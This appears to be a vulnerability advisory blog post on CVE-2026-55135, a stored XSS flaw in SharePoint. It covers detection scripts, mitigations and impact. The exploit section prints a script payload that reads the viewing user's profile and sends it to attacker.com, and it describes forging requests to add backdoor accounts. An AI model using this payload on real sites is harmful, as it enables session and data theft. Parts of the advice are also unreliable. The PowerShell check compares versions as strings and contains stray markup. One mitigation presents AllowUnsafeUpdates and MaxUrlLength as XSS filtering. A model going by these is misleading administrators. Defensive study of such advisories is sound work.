Listen to this Post
CVE-2026-55135 is a stored cross‑site scripting (XSS) vulnerability affecting Microsoft Office SharePoint Server. The flaw resides in the improper neutralization of user‑supplied input during web page generation – a classic CWE‑79 weakness. An authenticated attacker with minimal privileges (e.g., a contributor or site member) can inject malicious JavaScript payloads into SharePoint fields, list items, web part properties, or custom page content. Because SharePoint does not adequately sanitize or encode these inputs before rendering them in the browser, the injected script executes in the context of any victim who views the compromised page.
The attack vector is network‑based (AV:N) with low attack complexity (AC:L), meaning no special conditions are required beyond sending a crafted HTTP request. The attacker must be authenticated (PR:L) and the victim must interact with the malicious link or page (UI:R). The impact is limited to partial confidentiality and integrity loss (C:L/I:L) – an attacker can steal session cookies, impersonate the victim, or spoof legitimate SharePoint content to trick users into revealing sensitive information. However, availability is not affected (A:N).
The vulnerability affects all x64‑based deployments of SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition prior to the fixed build numbers. Microsoft released patches as part of the July 2026 Patch Tuesday (14 July 2026), addressing this issue alongside a record 622 other flaws. The CVSS base score is 4.6 (Medium), reflecting the need for authentication and user interaction, yet the practical risk is elevated because SharePoint is a central collaboration platform where XSS can pivot to privilege escalation or data exfiltration across the entire tenant.
DailyCVE Form:
Platform: Microsoft SharePoint
Version: <16.0.5561.1001 (2016), <16.0.10417.20175 (2019), <16.0.19725.20434 (Subs.)
Vulnerability: Stored XSS (CWE‑79)
Severity: MEDIUM (CVSS 4.6)
date: 2026‑07‑14
Prediction: Patch already released (2026‑07‑14)
What Undercode Say:
Analytics – Detection & Verification Scripts
Check SharePoint build version via PowerShell
Get-SPFarm | Select-Object BuildVersion
Query affected builds:
16.0.5561.1001 (Enterprise 2016)
16.0.10417.20175 (Server 2019)
16.0.19725.20434 (Subscription Edition)
Search for unpatched servers in the farm
Get-SPServer | ForEach-Object {
$ver = (Get-SPFarm).BuildVersion.ToString()
if ($ver -lt "16.0.5561.1001" -or ($ver -ge "16.0.10000" -and $ver -lt "16.0.10417.20175") -or ($ver -ge "16.0.19000" -and $ver -lt "16.0.19725.20434")) {
Write-Warning "Server $($<em>.Address) is vulnerable to CVE-2026-55135"
}
}
Grep IIS logs for suspicious XSS payloads (e.g., <script> tags in URL parameters)
findstr /R /C:"<script" /C:"alert(" /C:"onerror=" C:\inetpub\logs\LogFiles\W3SVC.log
Check installed SharePoint updates via Windows Update history
Get-HotFix | Where-Object { $</em>.HotFixID -match "KB5002\d{4}" } | Sort-Object InstalledOn
Verify patch presence using the official Microsoft Update catalog
Expected KBs for July 2026 Patch Tuesday (example)
$expectedKBs = @("KB5002843", "KB5002844", "KB5002845")
Get-HotFix | Where-Object { $expectedKBs -contains $_.HotFixID }
Exploit:
A practical exploit leverages a SharePoint list or web part that accepts user input without proper encoding. An attacker with contribute permissions can insert a payload like:
<script>fetch('/_api/web/currentuser').then(r=>r.json()).then(d=>fetch('https://attacker.com/steal?data='+btoa(JSON.stringify(d))))</script>
into a multi‑line text field, a custom property of a Content Editor Web Part, or a column default value. When an administrator or any other user views the list or page, the script executes in their browser, exfiltrating their session token, user profile data, or even performing authenticated actions on their behalf. Because SharePoint’s request validation tokens (__RequestVerificationToken) are also accessible, the attacker can craft POST requests to change permissions, add backdoor accounts, or download sensitive documents – all while appearing as the victim.
Protection:
- Apply the official Microsoft patch released on 14 July 2026 (included in the July Cumulative Update for each affected SharePoint version).
- Enable built‑in XSS filtering in SharePoint by configuring the
SPWebApplication’s `MaxUrlLength` and `AllowUnsafeUpdates` properties to reject suspicious inputs. - Restrict “Add & Customize Pages” permissions to only trusted administrators, as this privilege is often required to inject scripts into web parts.
- Deploy a Web Application Firewall (WAF) in front of SharePoint to block common XSS patterns (e.g.,
<script,onerror=,javascript:). - Regularly audit custom solutions and third‑party web parts for proper output encoding using `SPEncode.HtmlEncode` or
AntiXssEncoder. - Enforce Content Security Policy (CSP) headers via IIS URL Rewrite rules to whitelist only approved script sources, mitigating the impact even if a payload slips through.
Impact:
- Confidentiality breach – attacker can steal sensitive data, including documents, emails, and user credentials, by executing scripts in the context of a privileged user.
- Spoofing & phishing – malicious content can be injected into trusted SharePoint pages, leading users to enter credentials or download malware.
- Privilege escalation – with an admin’s session, the attacker can modify site permissions, create new admin accounts, or exfiltrate the entire site collection.
- Compliance violations – unauthorised data access may trigger GDPR, HIPAA, or other regulatory breaches.
- Operational disruption – though availability is not directly impacted, cleanup of injected scripts and recovery of compromised accounts can cause significant downtime.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

